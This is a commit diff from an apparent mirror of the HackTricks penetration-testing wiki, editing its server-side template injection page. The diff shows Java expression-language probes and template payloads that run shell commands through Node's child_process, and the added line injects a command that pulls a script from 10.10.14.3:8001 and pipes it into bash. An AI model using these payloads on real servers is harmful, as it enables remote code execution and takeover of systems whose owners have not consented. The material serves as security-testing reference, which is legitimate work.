mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
GitBook: [#2902] No subject
This commit is contained in:
parent
92b16b6652
commit
08fd55dbf3
1 changed files with 2 additions and 1 deletions
|
@ -338,7 +338,7 @@ Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstanc
|
|||
### Expression Language - EL (Java)
|
||||
|
||||
* `${"aaaa"}` - "aaaa"
|
||||
* `${99999+1}` - 100000.
|
||||
* `${99999+1}` - 100000. 
|
||||
* `#{7*7}` - 49
|
||||
* `${{7*7}}` - 49
|
||||
* `${{request}}, ${{session}}, {{faceContext}}`
|
||||
|
@ -501,6 +501,7 @@ URLencoded:
|
|||
|
||||
* `#{7*7} = 49`
|
||||
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /tmp/pwned.txt')}()}`
|
||||
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.14.3:8001/s.sh | bash')}()}`
|
||||
|
||||
#### Example server side render
|
||||
|
||||
|
|
Loading…
Reference in a new issue